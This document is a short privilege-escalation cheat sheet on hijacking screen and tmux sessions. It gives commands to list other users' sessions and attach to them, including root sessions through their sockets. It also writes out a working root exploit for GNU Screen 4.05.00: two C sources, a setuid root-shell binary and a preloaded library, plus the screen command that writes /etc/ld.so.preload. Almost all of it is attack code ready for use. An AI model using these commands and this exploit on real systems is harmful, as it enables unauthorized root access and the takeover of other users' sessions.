Screen / tmux Hijacking

screen -ls

ls -la /var/run/screen/
ls -la /run/screen/

ls -la /var/run/screen/S-root/ 2>/dev/null
ls -la /run/screen/S-root/ 2>/dev/null

screen -dr <session_id>

screen -x root/<session_name>

ls -la /usr/bin/screen
find / -perm -4000 -name "screen*" 2>/dev/null

# Check version
screen --version
# GNU Screen version 4.05.00

https://www.exploit-db.com/exploits/41154

# Create libhax.c
cat << 'EOF' > /tmp/libhax.c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
__attribute__((constructor))
void dropshell(void) {
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
}
EOF

# Create rootshell.c
cat << 'EOF' > /tmp/rootshell.c
#include <stdio.h>
int main(void) {
    setuid(0); setgid(0); seteuid(0); setegid(0);
    execvp("/bin/sh", NULL);
}
EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
gcc -o /tmp/rootshell /tmp/rootshell.c

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell

tmux ls

find /tmp -name "tmux-*" 2>/dev/null
ls -la /tmp/tmux-*/

ls -la /tmp/tmux-0/ 2>/dev/null

tmux attach -t <session_name>

tmux -S /path/to/socket attach

ls -la /tmp/tmux-0/default

tmux -S /tmp/tmux-0/default attach

echo "=== Screen ===" && screen -ls 2>/dev/null && ls -la /var/run/screen/ /run/screen/ 2>/dev/null && echo "=== tmux ===" && tmux ls 2>/dev/null && find /tmp -name "tmux-*" -exec ls -la {} \; 2>/dev/null